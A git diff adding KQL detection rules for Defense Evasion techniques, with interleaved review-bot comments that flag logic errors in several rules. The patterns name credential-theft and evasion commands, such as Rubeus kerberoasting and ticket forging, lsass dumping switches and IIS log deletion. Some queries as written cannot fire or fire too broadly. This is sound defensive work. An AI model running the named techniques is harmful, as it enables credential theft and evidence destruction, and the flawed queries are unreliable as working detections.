diff --git a/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql b/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql
new file mode 100644
index 00000000..74133563
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - F-Secure C3 Load by Rundll32
+// Author: Alfie Champion (ajpc500)
+// Date: 2021-06-02
+// Level: critical
+// Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains "StartNodeRelay"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql b/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql
new file mode 100644
index 00000000..6294992f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - GMER Rootkit Detector and Remover Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-05
+// Level: high
+// Description: Detects the execution GMER tool based on image and hash fields.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\gmer.exe" or (MD5 startswith "E9DC058440D321AA17D0600B3CA0AB04" or SHA1 startswith "539C228B6B332F5AA523E5CE358C16647D8BBE57" or SHA256 startswith "E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql b/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql
new file mode 100644
index 00000000..e32386a6
--- /dev/null
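Review bot: The hash clauses of the GMER rule use `startswith` against complete MD5, SHA1 and SHA256 values, which is looser than the data warrants: a full-length hash should be compared for equality, and `startswith` would only be appropriate if the source rule supplied a truncated prefix. The exact, case-insensitive form is `(MD5 =~ "E9DC058440D321AA17D0600B3CA0AB04" or SHA1 =~ "539C228B6B332F5AA523E5CE358C16647D8BBE57" or SHA256 =~ "E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173")`. If the converter maps every Sigma hash field through `startswith`, the fix belongs in the field-mapping rather than in this one file.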
+++ b/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - KrbRelayUp Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-26
+// Level: high
+// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1558.003, attack.lateral-movement, attack.t1550.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql b/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql
new file mode 100644
index 00000000..199077a2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - PowerTool Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-29
+// Level: high
+// Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\PowerTool.exe" or FolderPath endswith "\\PowerTool64.exe") or ProcessVersionInfoOriginalFileName =~ "PowerTool.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql b/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql
new file mode 100644
index 00000000..6260e800
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Rubeus Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-12-19
+// Level: critical
+// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1003, attack.t1558.003, attack.lateral-movement, attack.t1550.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql b/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql
new file mode 100644
index 00000000..db9b648f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - SharpEvtMute Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-07
+// Level: high
+// Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SharpEvtMute.exe" or ProcessVersionInfoFileDescription =~ "SharpEvtMute" or (ProcessCommandLine contains "--Filter \"rule " or ProcessCommandLine contains "--Encoded --Filter \\\"")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql b/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql
new file mode 100644
index 00000000..e0279736
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Wmiexec Default Powershell Command
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-08
+// Level: high
+// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.lateral-movement
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql b/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql
new file mode 100644
index 00000000..8490e559
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - XORDump Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-28
+// Level: high
+// Description: Detects suspicious use of XORDump process memory dumping utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - Another tool that uses the command line switches of XORdump
+
+DeviceProcessEvents
+| where FolderPath endswith "\\xordump.exe" or (ProcessCommandLine contains " -process lsass.exe " or ProcessCommandLine contains " -m comsvcs " or ProcessCommandLine contains " -m dbghelp " or ProcessCommandLine contains " -m dbgcore ")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hh_exe_execution.kql b/KQL/rules/Defense Evasion/hh_exe_execution.kql
new file mode 100644
index 00000000..97d3017c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hh_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: HH.EXE Execution
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community
+// Date: 2019-10-24
+// Level: low
+// Description: Detects the execution of "hh.exe" to open ".chm" files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001
+// False Positives:
+// - False positives are expected with legitimate ".CHM"
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".chm" and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql b/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql
new file mode 100644
index 00000000..5c14fe30
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hidden_flag_set_on_file_directory_via_chflags_macos.kql
@@ -0,0 +1,14 @@
+// Title: Hidden Flag Set On File/Directory Via Chflags - MacOS
+// Author: Omar Khaled (@beacon_exe)
+// Date: 2024-08-21
+// Level: medium
+// Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS.
+When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
+// False Positives:
+// - Legitimate usage of chflags by administrators and users.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "hidden " and FolderPath endswith "/chflags"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hidden_user_creation.kql b/KQL/rules/Defense Evasion/hidden_user_creation.kql
new file mode 100644
index 00000000..90195830
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hidden_user_creation.kql
@@ -0,0 +1,12 @@
+// Title: Hidden User Creation
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-10
+// Level: medium
+// Description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.002
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "create" and FolderPath endswith "/dscl") and (ProcessCommandLine contains "UniqueID" and ProcessCommandLine matches regex "([0-9]|[1-9][0-9]|[1-4][0-9]{2})")) or ((ProcessCommandLine contains "create" and FolderPath endswith "/dscl") and (ProcessCommandLine contains "IsHidden" and (ProcessCommandLine contains "true" or ProcessCommandLine contains "yes" or ProcessCommandLine contains "1")))
\ No newline at end of file
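Review bot: In the Hidden User Creation rule the `matches regex "([0-9]|[1-9][0-9]|[1-4][0-9]{2})"` clause is unanchored, so it matches any digit anywhere in the command line; a `dscl ... -create ... UniqueID 1001` invocation still contains a single digit, so the "UserID < 500" condition stated in the description is never actually enforced and the first branch fires on every dscl create that mentions UniqueID. Anchoring the number to the argument and to a following delimiter fixes it: `ProcessCommandLine matches regex @"UniqueID\s+([0-9]|[1-9][0-9]|[1-4][0-9]{2})(\s|$)"`. The `contains "1"` alternative in the IsHidden branch has the same weakness and would be better as `matches regex @"IsHidden\s+(true|yes|1)(\s|$)"`. The pattern was probably inherited from the Sigma source, so the fix may belong upstream as well as in the converter's output.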
diff --git a/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql b/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql
new file mode 100644
index 00000000..cc4ed67a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hide_schedule_task_via_index_value_tamper.kql
@@ -0,0 +1,14 @@
+// Title: Hide Schedule Task Via Index Value Tamper
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-26
+// Level: high
+// Description: Detects when the "index" value of a scheduled task is modified from the registry
+Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql b/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql
new file mode 100644
index 00000000..330fa07c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql
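Review bot: Two clauses make this rule unable to fire on Defender for Endpoint data: `RegistryKey endswith "...\\Schedule\\TaskCache\\Tree*"` carries a literal `*` (a Sigma wildcard that KQL does not interpret), so `endswith` demands a key name that literally ends in `Tree*`, and `RegistryValueData =~ "DWORD (0x00000000)"` is the Sysmon `Details` rendering, whereas DeviceRegistryEvents stores the raw value (`"0"`, with `RegistryValueType` carrying the type). The value name also lives in `RegistryValueName` rather than in `RegistryKey`, so `RegistryKey contains "Index"` will miss as well; a working predicate would be `| where RegistryValueData == "0" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\" and RegistryValueName =~ "Index"`. The `DWORD (0x00000000)` comparison recurs in Hiding User Account Via SpecialAccounts Registry Key in the next hunk, so the converter should translate Sigma's Details DWORD form to the plain integer string generally rather than patching files one by one.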
@@ -0,0 +1,13 @@
+// Title: Hiding Files with Attrib.exe
+// Author: Sami Ruohonen
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects usage of attrib.exe to hide files from users.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+// False Positives:
+// - IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)
+// - Msiexec.exe hiding desktop.ini
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " +h " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")) and (not(ProcessCommandLine contains "\\desktop.ini ")) and (not((ProcessCommandLine =~ "+R +H +S +A \\*.cui" and InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat" and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql
new file mode 100644
index 00000000..e0df0a0f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key.kql
@@ -0,0 +1,10 @@
+// Title: Hiding User Account Via SpecialAccounts Registry Key
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2022-07-12
+// Level: high
+// Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"
\ No newline at end of file
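Review bot: The IgfxCUIService exclusion never fires: `=~` is an exact case-insensitive comparison and KQL does not expand `*`, so `InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat"` cannot match any real command line, and `"+R +H +S +A \\*.cui"` carries a literal backslash before the asterisk that looks like an escape carried over from the Sigma source. A faithful translation is `ProcessCommandLine =~ "+R +H +S +A *.cui"` together with `InitiatingProcessCommandLine startswith "C:\\WINDOWS\\system32\\" and InitiatingProcessCommandLine endswith ".bat"`. The effect today is only extra noise from that benign case rather than a blind spot, but the wildcard-inside-equality pattern is worth grepping for across the rest of the converter's output.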
diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql
new file mode 100644
index 00000000..c4871a93
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql
@@ -0,0 +1,13 @@
+// Title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-05-14
+// Level: medium
+// Description: Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.002
+// False Positives:
+// - System administrator activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" and ProcessCommandLine contains "add" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/d 0") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql b/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql
new file mode 100644
index 00000000..09522f85
--- /dev/null
+++ b/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql
@@ -0,0 +1,10 @@
+// Title: HTML Help HH.EXE Suspicious Child Process
+// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-04-01
+// Level: high
+// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql b/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql
new file mode 100644
index 00000000..3452769e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hypervisor_enforced_code_integrity_disabled.kql
@@ -0,0 +1,11 @@
+// Title: Hypervisor Enforced Code Integrity Disabled
+// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
+// Date: 2023-03-14
+// Level: high
+// Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql b/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql
new file mode 100644
index 00000000..916a2541
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hypervisor_enforced_paging_translation_disabled.kql
@@ -0,0 +1,11 @@
+// Title: Hypervisor Enforced Paging Translation Disabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-05
+// Level: high
+// Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value. Where the it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\DisableHypervisorEnforcedPagingTranslation"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql b/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql
new file mode 100644
index 00000000..a7f6164b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql
@@ -0,0 +1,11 @@
+// Title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols
+// Author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)
+// Date: 2023-09-05
+// Level: high
+// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where RegistryValueData contains "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and (RegistryKey endswith "\\http" or RegistryKey endswith "\\https")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql b/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql
new file mode 100644
index 00000000..3abdf710
--- /dev/null
+++ b/KQL/rules/Defense Evasion/iis_webserver_access_logs_deleted.kql
@@ -0,0 +1,13 @@
+// Title: IIS WebServer Access Logs Deleted
+// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-16
+// Level: medium
+// Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - During uninstallation of the IIS service
+// - During log rotation
+
+DeviceFileEvents
+| where FolderPath contains "\\inetpub\\logs\\LogFiles\\" and FolderPath endswith ".log"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql b/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql
new file mode 100644
index 00000000..0ce16f72
--- /dev/null
+++ b/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql
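Review bot: The query carries no ActionType restriction, so in DeviceFileEvents it matches every create, modify and rename of a file under `\inetpub\logs\LogFiles\` — i.e. every routine IIS log write — rather than the deletions the title and description promise, which makes the rule fire constantly on any busy web server. The where clause should be `| where ActionType == "FileDeleted" and FolderPath contains "\\inetpub\\logs\\LogFiles\\" and FolderPath endswith ".log"`. The legitimate-application-dropped-archive hunk has the same shape; there the Sigma file-event category presumably maps to `ActionType == "FileCreated"`, and the converter should emit the ActionType filter from the Sigma logsource category in both cases.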
@@ -0,0 +1,15 @@
+// Title: IIS WebServer Log Deletion via CommandLine Utilities
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-02
+// Level: medium
+// Description: Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks.
+Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - Deletion of IIS logs that are older than a certain retention period as part of regular maintenance activities.
+// - Legitimate schedule tasks or scripts that clean up log files regularly.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase " or ProcessCommandLine contains "rm " or ProcessCommandLine contains "remove-item " or ProcessCommandLine contains "rmdir ") and ProcessCommandLine contains "\\inetpub\\logs\\" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("cmd.exe", "powershell.exe", "powershell_ise.exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql b/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql
new file mode 100644
index 00000000..e029eef4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql
@@ -0,0 +1,10 @@
+// Title: ImagingDevices Unusual Parent/Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ImagingDevices.exe" or (FolderPath endswith "\\ImagingDevices.exe" and (InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql b/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql
new file mode 100644
index 00000000..df92991d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/indicator_removal_on_host_clear_mac_system_logs.kql
@@ -0,0 +1,12 @@
+// Title: Indicator Removal on Host - Clear Mac System Logs
+// Author: remotephone, oscd.community
+// Date: 2020-10-11
+// Level: medium
+// Description: Detects deletion of local audit logs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.002
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (FolderPath endswith "/rm" or FolderPath endswith "/unlink" or FolderPath endswith "/shred") and (ProcessCommandLine contains "/var/log" or (ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Logs/"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql b/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql
new file mode 100644
index 00000000..87b18b56
--- /dev/null
+++ b/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql
@@ -0,0 +1,13 @@
+// Title: Indirect Command Execution By Program Compatibility Wizard
+// Author: A. Sungurov , oscd.community
+// Date: 2020-10-12
+// Level: low
+// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+// False Positives:
+// - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts
+// - Legit usage of scripts
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql b/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql
new file mode 100644
index 00000000..cb39c703
--- /dev/null
+++ b/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql
@@ -0,0 +1,12 @@
+// Title: Indirect Command Execution From Script File Via Bash.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-15
+// Level: medium
+// Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.
+This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") and (not(((ProcessCommandLine contains "bash.exe -" or ProcessCommandLine contains "bash -") or ProcessCommandLine =~ "" or isnull(ProcessCommandLine) or (ProcessCommandLine in~ ("bash.exe", "bash")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql b/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql
new file mode 100644
